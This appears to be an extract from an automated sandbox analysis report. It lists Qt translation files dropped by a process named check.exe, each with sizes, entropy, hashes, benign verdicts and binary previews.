                                                                                                                                                                                                            Size (bytes):146
                                                                                                                                                                                                            Entropy (8bit):3.6255640074603277
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/IrLlAlHekfK/gp1MUXaMlI+rwtbWlMiayIPldkOgn:CwDrC+TYIUrIRt6HoiHn
                                                                                                                                                                                                            MD5:5A46979B45C67DD6312F33CCEA2ED7BC
                                                                                                                                                                                                            SHA1:4C56836B1FB10D9903B299CBCB925947D515B4C8
                                                                                                                                                                                                            SHA-256:BB246AABD501E14CED8B1FFC1369E3D5D26567AAE62B3EAD4D94C22FB77C3471
                                                                                                                                                                                                            SHA-512:BDBA4E1731CF254E95B0F1337410937C765E96FBB1D42F1D053033E1511FEE6F50C02705F781F4DAA0347E2299DC78A5A9942AC4EA343ED1F8F401F9ACD961E4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......hu....v.....q.t.b.a.s.e._.h.u.....q.t.s.c.r.i.p.t._.h.u.....q.t.m.u.l.t.i.m.e.d.i.a._.h.u... .q.t.x.m.l.p.a.t.t.e.r.n.s._.h.u
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):153
                                                                                                                                                                                                            Entropy (8bit):3.5752972123113778
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/EbFlAlHeke5zOp1MUWLt7KlI+rwtbWlMj5FKIPldkOA9kk:CwDM+35aIUW5SIRt6Q50oi9Gk
                                                                                                                                                                                                            MD5:2BB8C94D420D3BC344C79A01043BDC89
                                                                                                                                                                                                            SHA1:3FBA773D58E6D3699C20AB41AEE6801E71E2DDAE
                                                                                                                                                                                                            SHA-256:9117AAC2D07BC86DFA55A29B8825ED27C7093300FCC90E143E135E00E85F09D7
                                                                                                                                                                                                            SHA-512:C6B13655AFB206B0056F5656B4A9BF33CC267FCC928F6973258131CFA6443970510226FE45A041E5AA988809E17D0B11C7458F4A241C71521EDED186596C6055
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......it....v.....q.t.b.a.s.e._.i.t.....q.t.s.c.r.i.p.t._.i.t.....q.t.m.u.l.t.i.m.e.d.i.a._.i.t... .q.t.x.m.l.p.a.t.t.e.r.n.s._.i.t.......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):146
                                                                                                                                                                                                            Entropy (8bit):3.599979504080125
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/il/lAlHekd6hY1MUV6JAlI+rwtbWlMgel3UlIPldkOG:Cwz4+pjUGAIRt6qVUloiB
                                                                                                                                                                                                            MD5:8A1EE3433304838CCD0EBE0A825E84D8
                                                                                                                                                                                                            SHA1:2B3476588350C5384E0F9A51FF2E3659E89B4846
                                                                                                                                                                                                            SHA-256:23457CE8E44E233C6F85D56A4EE6A2CECD87C9C7BDDE6D8B8A925902EED1CD9C
                                                                                                                                                                                                            SHA-512:2D8ACD668DF537E98B27161F9FA49828EB2EB6E9CF41DB38E7F5D31F610D150CD1B580A8AE9B472A4DFDE4D4BF983C24A56293BB911CF5879368664E4D4CF3D2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......ja....v.....q.t.b.a.s.e._.j.a.....q.t.s.c.r.i.p.t._.j.a.....q.t.m.u.l.t.i.m.e.d.i.a._.j.a... .q.t.x.m.l.p.a.t.t.e.r.n.s._.j.a
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):146
                                                                                                                                                                                                            Entropy (8bit):3.652277257665055
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/rrr/lAlHekcQ/01MUUQMlI+rwtbWlMhQGlIPldkORn:CwCC+1Q/UUpIRt6SBloimn
                                                                                                                                                                                                            MD5:7B2659AF52B824EAC6C169CDD9467EE9
                                                                                                                                                                                                            SHA1:5727109218B222E3B654A8CC9933E970EB7C2118
                                                                                                                                                                                                            SHA-256:4CC1AF37E771F0A43898849CFF2CD42A820451B8D2B2E88931031629D781DB05
                                                                                                                                                                                                            SHA-512:E9475AC80BDBBEFF54F2724A2B6BA76992F18FD1913FD8EE1540A99FD7A112B79FED5A130B6AC6D7460E4420C06354FC6E4CF7770A7C6CBD3EAC1BDAF0082DE5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......ko....v.....q.t.b.a.s.e._.k.o.....q.t.s.c.r.i.p.t._.k.o.....q.t.m.u.l.t.i.m.e.d.i.a._.k.o... .q.t.x.m.l.p.a.t.t.e.r.n.s._.k.o
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):165383
                                                                                                                                                                                                            Entropy (8bit):4.805977227348512
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:i5v3+zmayloj6yJjhnBAbnrKnGrhA7WgdXclIsooY9i:SvOzAloj6yJ9BA7riGr+7WKXc+s5ui
                                                                                                                                                                                                            MD5:8992B652D1499F5D2F12674F3F875A35
                                                                                                                                                                                                            SHA1:E22766A49612F79156C550D83C6C230345DDA433
                                                                                                                                                                                                            SHA-256:47EB5F97467DF769261421D54A5BEA1131C9FB9B6388791D38BB6574335B64BF
                                                                                                                                                                                                            SHA-512:9B8B6DBFF432F2A46C14BC183A6BAF84ACBF02BF2C5BB8C306C6538FBD9BE1C0A9015BD46728F2F652F9163AFC56B1E16D16EB95D8F7728F3C562AE9F4F1AE1E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......ltB..0X...*..)C...+...|......P....@..9....A..9....B..:....C..:....D..;....E..;....F..<6...G..<....H..=)...I..=....P..>q...Q..>....R..?....S..@f...T..@....U..A\...V..B....W..B....X..C....Y..Cy...]..k....t..........t>......th......t.......pd...;..J'...;.._h...;.......;...{...;..J....;...)...M..l....O...R...O...............}..l9...m..lo......^S..(5..P{..+;..4...+;......+;......+O..4...+O......1...^...E@..?p..F...C...H4......HY......H.......I...D...I@..s...IA..t...IC...2..J.......J....Y..J.......J.......K...9...LD...`..L.......PS......R.......T...q...Zr...`..[`......[`..&@..\....e..\....b.._......._....P..1........E..........5........L..1...O...1...PP......7......../...........$.......$.......,.......y.......y..........K^..............x......8................L...E.......E.......E..*....................%..:....%.........0U.....W......Zo.....^....5.......0..I....0...F...0...|...0.......0.......0..+\...5...}.......... D...g.. D......+....j..,.......,.......<U...+..<U
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):89
                                                                                                                                                                                                            Entropy (8bit):4.156834975253888
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/HzllldQlHekbxplUp1MUTJ+b:Cwv+DIUEb
                                                                                                                                                                                                            MD5:19F1B919BB531E9E12E7F707BEBD8497
                                                                                                                                                                                                            SHA1:46E82683CEA28D877C73A5CE02F965BB1130FC62
                                                                                                                                                                                                            SHA-256:03467738042A15676E504BA02CB326DCDB773B171FADA3CD62B7A0E0564314A0
                                                                                                                                                                                                            SHA-512:901D7B26CAC7A4D0FFDB39A1D25767B5BC71BED4AFBE788D70BF19D4C58A8295167111675AB45E743FDF4768AF874D69417414C01CF23D5C525A3F6C8BF7D21F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......lv....0.....q.t.b.a.s.e._.l.v.....q.t.s.c.r.i.p.t._.l.v........)....
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):161
                                                                                                                                                                                                            Entropy (8bit):3.8693516202048612
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/5J/p/lAlHekHp/7KlI+rwtbWlM6Tl/z21MUPp/FOlIPldkOjehB:Cwr+26IRt6nFURkloiT
                                                                                                                                                                                                            MD5:D71EA9FEFD97464B178235150EC8759E
                                                                                                                                                                                                            SHA1:61026FE602FD1B8B442A0D341C6BD759EEC75488
                                                                                                                                                                                                            SHA-256:BD7DD0C2CAB119A973DC10C3BFF7499D9728B928B541F86056921B30C8DB78E6
                                                                                                                                                                                                            SHA-512:ECD76A7D8B8D733E635B2BFEA90A4CD387B83D9D8A4EB6D299F59FF22AAA8D617A4C886A825A1CDDD901925C7839E2C18BDD4E0CD84152641922B66B62663F77
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......pl....v.....q.t.b.a.s.e._.p.l.....q.t.m.u.l.t.i.m.e.d.i.a._.p.l.....q.t.s.c.r.i.p.t._.p.l... .q.t.x.m.l.p.a.t.t.e.r.n.s._.p.l............,..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):70334
                                                                                                                                                                                                            Entropy (8bit):4.732724622610353
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:OKGUuWW+WHjS0gMBd483+Y7bDPs4RHBloLUIltlzAJnx4nnliM1OPlOibLG:JGUuWPuSgm0Jn+n4Mhj
                                                                                                                                                                                                            MD5:6656500F7A28EF820AE9F97FD47FB5BB
                                                                                                                                                                                                            SHA1:CC112B9C9513BCF7497F3417168B4C8A9F7640A9
                                                                                                                                                                                                            SHA-256:2C1E7BBF5168A64B43752DD4C547601C0BDE6D610F8671FA3E3AF38597E84783
                                                                                                                                                                                                            SHA-512:5C3CBFCF86AF6B4D949C1D914CD379E512E73BA350AF661033A386EE7FB981FBFCB43D9A35FDE7656E17BB09F64F1469F84867A780573C3359D645269461D5A6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......pt_PTB...(...*...9...+...e...]..6....;.......;..-....;..;`...;..};...;.......M..6....O... ...O...w...........}..7....m..7B..........+;......+;..8S..+;..>...+O......+O..8#..H4......H.......J......K.......LD...)..L....}..PS...l..Zr...B..[`...;..[`.....\...kU.._......._.......1...?...............8...............E............,..................p........0...............v...........%...O...%..G........4...0.......0..:....0..y....0..|....0.......0...X...5.......5...... D..=... D..Kn..+....L..,...>...,......<U..z...<U......<.......F...>...F.......H5...4..H5..=...H5..K...H5......f....p..f...1...f...;...f...I...f...|H..f.......f.......l....................b......<...............>.......L ...........`......`..._.......A......2....e...g...e..>D...e..LW................y...,.*.y.....*.y..o..*.y.....*.T..L..*.0..'..*.0....+F...y..+F......+f......+f...C..+.z..0..+.....d.+....p0.+.....R.+.z..0U.+.....u.+....8..+....Ct.+....L..+....y..+.....Z.+......+...pc.+.....+....0..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):164
                                                                                                                                                                                                            Entropy (8bit):3.984562388316898
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/oZlAlHekF8Op1MUNKJKlI+rwtbWlM4KKIPldkOSxRMugB:CwY+GIUgcIRt61oihM3
                                                                                                                                                                                                            MD5:F7A8C75408B9A34A2B185E76F51B7B85
                                                                                                                                                                                                            SHA1:065E987139C5FB809A6F9CDF3845BCD79707FDBB
                                                                                                                                                                                                            SHA-256:6492B267608C6FB76907BD8FCFC8F1EF57E9F4EBBC2E81ACA81715A88388F94A
                                                                                                                                                                                                            SHA-512:E768C5B438EC899801B22B1325F2244ACCC5E7C2EC5D270F510BC3CBC2D9A0536949C026DB7FB5862835E506A9F2020DEB2CC4001E7011FF974324542734F855
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......ru....v.....q.t.b.a.s.e._.r.u.....q.t.s.c.r.i.p.t._.r.u.....q.t.m.u.l.t.i.m.e.d.i.a._.r.u... .q.t.x.m.l.p.a.t.t.e.r.n.s._.r.u........)......,..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):157
                                                                                                                                                                                                            Entropy (8bit):3.7731953311404336
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/3xRlAlHekE8lgp1MUM8lMlI+rwtbWlM5UllyIPldkOfll6kchn:CwS0+t8CIUM86IRt6KUlsoi2CVh
                                                                                                                                                                                                            MD5:24C179481B5EF574F33E983A62A34D53
                                                                                                                                                                                                            SHA1:0A67F1ED8CA4A5182F504806F8D47D499789F2D2
                                                                                                                                                                                                            SHA-256:B6ADFFD889FF96BF195CB997327E7D7005A815CAD67823FA6915A19C2D9BB668
                                                                                                                                                                                                            SHA-512:4757F3693120DAB2FBB7BCF1734EA20B3E3D9056B4B4E934A3129D660CFDC6C58B230459DB55912AF24AD5692BD221830BE0FF91E41D3EECD9439E79AC23FFE6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......sk....v.....q.t.b.a.s.e._.s.k.....q.t.s.c.r.i.p.t._.s.k.....q.t.m.u.l.t.i.m.e.d.i.a._.s.k... .q.t.x.m.l.p.a.t.t.e.r.n.s._.s.k...........
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):228428
                                                                                                                                                                                                            Entropy (8bit):4.726953418955661
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:9zQH0hOtgmiAZu0eeAEv+v49JnnSmICgr3n7jhCQUeinqyU5UggtRLGrQ2LZO+Y1:RpUsSpGr36wsR
                                                                                                                                                                                                            MD5:D35A0FE35476BE8BD149CEE46E42B5E9
                                                                                                                                                                                                            SHA1:9F3C85C115A283E5230D1EEAD84C8CB73A71FA03
                                                                                                                                                                                                            SHA-256:C44E0313A9414CC0E490B65B0C036FA11BCA959353B228886547BC2C8492034F
                                                                                                                                                                                                            SHA-512:BEEB1751882AF081E80BE93F7464D4C6322B724EFA2CBD3E1CBE709181D380C1C57E770FA962BB706D6FCF4A8CB393E3F6E187C1F604F8CEEFB201CA3200BD1C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......slB..<....*.......+.......@...C...A.......B...<...C.......D...2...E.......F...d...G.......H...W...I.......P.......Q.......R.......S...x...T.......U...n...V...%...W.......X.......Y.......]..g~...t...V.......f..................................;..G....;..[....;...q...;..ia...;... ...M..g....O.......O.......[..,e...........}..g....m..h........Q..(5......+;..2...+;...b..+;...i..+O..2...+O...4..1......E@......F.......H4......HY...%..H.......I.......I@......IA...9..IC......J...6...J.......J.......J...^...K...7...LD......L....n..PS...U..R.......T....=..Zr......[`...V..[`......\...!,..\...8U.._..."b.._.../h..1.......E...9......4...............5........e...................$...<...$..Z....[.......,.......y...L...y..].......H.......@.......J.......6........~..........E...O...E..+....E...~..............,1...%..8r...%...........^..............................5.......0..Gx...0.......0..P....0..h....0.......0.......5...^.......... D...... D......+....`..,.......,...-...<U
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):65851
                                                                                                                                                                                                            Entropy (8bit):4.7906769989650515
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:4u6DkpgyKmRmG15mGM6iFPi6Q/qTlOQZY2dKN8gKw:4u6DotUG1sGMZPi6Q/qTlO2Y2YKw
                                                                                                                                                                                                            MD5:0E85E0E0E7DDFE3D4BDE302F27047F9C
                                                                                                                                                                                                            SHA1:AE59348E0C2E4F86F99DA6CF5DAB3B7E92504B7C
                                                                                                                                                                                                            SHA-256:4B4B6FF7FD237C9DA0301B4946132E68653D15EB5FAF38E4C5FBFEBB12DD97F7
                                                                                                                                                                                                            SHA-512:8CAAB6C61E9FA26A3A289A9E4DC515D157B3092D6D4ED43861220261BD2B7CC79B35B52F9ADE4EF558B5385B37EAC14575420DD55C475F435BB95B6C1E2561B6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`...B.......*.......+...i...]..6....;.......;..-f...;..:;...;..t....;.......M..64...O.......O...........q...}..6\...m..6........(..+;......+;..7...+;..=...+O......+O..7c..H4......H.......J.......K....F..LD...+..L.......PS...N..Zr......[`...7..[`...N..\...h4.._....J.._....k..1...>...............7........}......D............,...........*......i....................................%.......%..Fc.......6...0.......0..9....0..q....0..t....0.......0.......5.......5...... D..<}.. D..I...+.......,...=X..,.......<U..r...<U...n..<.......F...=...F....F..H5......H5..<...H5..J4..H5......f.......f...1V..f...:f..f...H;..f...t&..f.......f.......l..................8......;z..............<.......Je.......6...`...&...`...!.......9......1....e.......e..=....e..J..............g...y.....*.y.../.*.y..h..*.y.....*.T..J..*.0..'[.*.0...K.+F...q..+F.....+f......+f...A..+.z../..+.......+....i`.+.....X.+.z../..+.....S.+....7..+....Bi.+....K..+....q..+.......+......+...i..+.....+....0..F0i.....G.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):110
                                                                                                                                                                                                            Entropy (8bit):3.630483009136986
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/7zl9lAlHekDN/01MULV4LlI+rwtbWlM+N:Cw5+wUGRIRt6n
                                                                                                                                                                                                            MD5:16CDF5B9D48B0F795D532A0D07F5C3A0
                                                                                                                                                                                                            SHA1:6E403C9096B3051973E2B681DFEBBC8DD024830D
                                                                                                                                                                                                            SHA-256:F574A2CFD4715885C3DBDF5AE60995252673BD94FDAA9586F7E0586F6C1AC0EE
                                                                                                                                                                                                            SHA-512:36A0431368010157EA8A45DCB00458076CCFFC08B37E443DEBD1AAD4A30C6080803337725A7A3DCBF2B410DC7BE89CEAF6C07C46F876E4EF5B08159E3BF38E6D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......tr....R.....q.t.b.a.s.e._.t.r.....q.t.s.c.r.i.p.t._.t.r.....q.t.m.u.l.t.i.m.e.d.i.a._.t.r
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):164
                                                                                                                                                                                                            Entropy (8bit):4.021402900389864
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/ZlRlAlHekCczOp1MUKUt7KlI+rwtbWlM/cFKIPldkONRMugB:CwUl0+rjIUKUcIRt6M/oioM3
                                                                                                                                                                                                            MD5:9B101363343847FE42167183320C03F0
                                                                                                                                                                                                            SHA1:F0DF2CFF913E588B7CADFDABBF69F4F632B2F96A
                                                                                                                                                                                                            SHA-256:F1621E680E1642F9463E4B07E7E78B50F9A7BDB7C321D7302039CB3405CBDEA4
                                                                                                                                                                                                            SHA-512:DA14FDF8DB514902733CAAC492293873351C595EBBE0ACB0849BECE24AB822602EE64D01051F1426CD1FC13A95D8607302CF9B515D9806FDD3BD047087DE447C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......uk....v.....q.t.b.a.s.e._.u.k.....q.t.s.c.r.i.p.t._.u.k.....q.t.m.u.l.t.i.m.e.d.i.a._.u.k... .q.t.x.m.l.p.a.t.t.e.r.n.s._.u.k........)......,..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):117347
                                                                                                                                                                                                            Entropy (8bit):5.8593733369029195
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:51dXW89nqEFu54aekvRzHHSVuf8j2+/xc3lhnbsfdAoz/w:v9qEFeLekvRznSVHJG3lhn+djY
                                                                                                                                                                                                            MD5:0D02F0DE5A12BCB338B7042DFBDAACF3
                                                                                                                                                                                                            SHA1:B7C10D249D8986AD8C6939B370407D07227A39F5
                                                                                                                                                                                                            SHA-256:28CDE75D7B32C81FEF1D4630C37B79A61DEC24B357632FF00D6365A57D8BE43B
                                                                                                                                                                                                            SHA-512:21F02EBA36B4411921EA3C70310B8E454E8FC2B8F09957FD6A63B71689DC381F7A5E2C3BDF2810734D659AB43D8A7BD46EF6436ECC52F75C71B5F5C313365444
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......zhB..+....*.......+.......@.......A...8...B.......C.......D.......E...V...F.......G...L...H.......I...9...P.......Q...e...R...^...S.......T...T...U.......V...|...W.......X...o...Y.......]..4 ...;...2...;..,....;..8....;.......;.......M..4H...O.......O...........#...}..4p...m..4........N..(5......+;...f..+;..6Y..+;..<...+O...8..+O..6'..1......E@......F....Y..H4..."..HY..J...H.......I.......J.......J.......K....5..LD..._..L......PS...V..Q....6..R...N...W..../..Zr.....[`.....[`......\...lU.._......._....L..1...<........j......6...............B........I...$..K....$.......,...g...y...3.......A......r...........................9..L7......;w...E..5b...E...G.......5...%.......%..D........`......*........................0.......0..8W...0..}y...0...6...0.......0.......5.......5...... D..:... D..J...+....R..,...;...,......<U..~...<U......<......F...;...F......H5...i..H5..:...H5..Jk..H5...w..VE...[..f....u..f...0X..f...9...f...E...f.......f.......f....j..g....A..l.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):141
                                                                                                                                                                                                            Entropy (8bit):3.7198292994386235
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/0N6xg/Rl/gl+kNXDelHrwtbWlMwTolIPldkOfDn:CwOO2+g6Mt63oloiUn
                                                                                                                                                                                                            MD5:ED4135D705AEF3D97F8BF6B8FF11F09C
                                                                                                                                                                                                            SHA1:308E2B8F74B863A61AD0B68F4A18ED06965EBEAA
                                                                                                                                                                                                            SHA-256:751ECDA0C33E061D91241268357FBD2F6B7F70A1116E714F28D22EFD61EC7A1A
                                                                                                                                                                                                            SHA-512:B6E6D00553A9C427130129B9D30E862028E549F372A832F0F05747C8E2A79E443F4932EC3AE177537C8BA00D26B5B6CB97D5B35426AB5229F6A468CA485BE0B1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......zh_TW....n.....q.t.b.a.s.e._.z.h._.T.W...$.q.t.m.u.l.t.i.m.e.d.i.a._.z.h._.T.W...&.q.t.x.m.l.p.a.t.t.e.r.n.s._.z.h._.T.W
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):160017
                                                                                                                                                                                                            Entropy (8bit):5.35627970915292
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:XGlAMfkX1M0RdaCkR8lfv8vtc8EFrVYA2I4AJZWEWgHg1C8COvzHKHC6Jp9NV0V7:XUr0RACkIwDEpV1Lgf1ubtw3Bb
                                                                                                                                                                                                            MD5:A7E4D0BA0FC5DF07F62CC66EC9878979
                                                                                                                                                                                                            SHA1:21FD131B23BDD1BBA7BBB86F3ED5C83876F45638
                                                                                                                                                                                                            SHA-256:E03FE68D83201543698FD7FE267DD5DFC5BFD195147E74FF2F19AC3491401263
                                                                                                                                                                                                            SHA-512:D9E6B10506FCF20B5B783F011908083D9DF6C5DF88E21B10D07F53A01AD6506A4B921C85335A25BAE54E27BAD7D01B6E240D58FDEEAABC7FF32014EC120C2ECF
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......arB..2....*.......+.......@.......A.......B..._...C......D.......E......F.......G... ...H...D...I...h...P...C...Q...g...R......S.......T.......U.......V...x...W......X.......Y.......]..'=...s......t...........]...........;..'....;..(....;.......;.......M..'e...O.......O...9...........}..'........C...=......m..'....t..........!o..(5...Z..+;..5u..+;..c...+O......1...!...D@...8..E@.....H4...,..HY..QI..H.......IC......J....1..J.......J.......LD......L.......PS......QR...R..R...V2..T.......U....]..X.......Zr.....[`......\....t..]x......_......._.......yg......1...6....E..8V..............C............................$..RN...[...0...,.......y.......y...................K...........9..R....E.."............z.......................%..F;...D...[..................................!....5.......0...I...0.......0...5...0..#....5.......5...p..............W}.. D..(... D..P=..+.......<U......<U......<.......H5..(...H5..P...L.......VE......VE......V....B..f...JJ..f.......f.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):165337
                                                                                                                                                                                                            Entropy (8bit):5.332219158085151
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:9ULiyUxPoT6qx+J7FJlaaMJnxjqxq+0Uiff0mbVeb7wiEwYuYqDKBkKHMXHCIMll:9ULpIVFnpwUiEujw27ncUQUz
                                                                                                                                                                                                            MD5:660413AD666A6B31A1ACF8F216781D6E
                                                                                                                                                                                                            SHA1:654409CDF3F551555957D3DBCF8D6A0D8F03A6C5
                                                                                                                                                                                                            SHA-256:E448AC9E3F16C29EB27AF3012EFE21052DAA78FABFB34CD6DFF2F69EE3BD3CDB
                                                                                                                                                                                                            SHA-512:C6AE4B784C3D302D7EC6B9CE7B27DDAF00713ADF233F1246CD0475697A59C84D6A86BAA1005283B1F89FCC0835FD131E5CF07B3534B66A0A0AA6AC6356006B8F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......bg_BGB../....*..,....+..."...@...]...A.......B.......C.......D...P...E...!...F.......G.......H.......I.......P.......Q.......R...A...S...e...T.......U.......V.......W...1...X...U...Y...y...]..,....s...,...t...................P...;..+....;..-E...;..!....;..+....M..,Y...O...,...O...........*...}..,............=...Q...m..,....t...|......>...(5..1...+;..<...+;..o...+O...r..1...>...D@......E@......H4......HY..[...H.......IC......J....E..J....X..J.......LD......L....L..PS......QR.."...R...`...T....X..U.......X.......Zr...q..[`...`..\.......]x......_......._....T..yg.....1...=....E..?...............L(.......(...............'...$..\....[.......,...I...y...!...y...................S...........9..]%...E..5p...........z..!q...................%..O....D..................D.....8......:......?....5...&...0.......0.. ....0...c...0..5....5.......5..................b:.. D..-... D..Z...+.......<U......<U...0..<.......H5..-...H5..[...L.......VE..#a..VE..;...V.......f...T...f...!..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):210159
                                                                                                                                                                                                            Entropy (8bit):4.666388181115542
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:P/DVhdlafzvZfeW+6kXEVjSVPzC3ceKdP2:xYf7UW+WjwP2
                                                                                                                                                                                                            MD5:B383F6D4B9EEA51C065E73ECB95BBD23
                                                                                                                                                                                                            SHA1:DD6C2C4B4888B0D14CEBFC86F471D0FC9B07FE42
                                                                                                                                                                                                            SHA-256:52E94FCC9490889B55812C5433D009B44BDC2DC3170EB55B1AF444EF4AAE1D7F
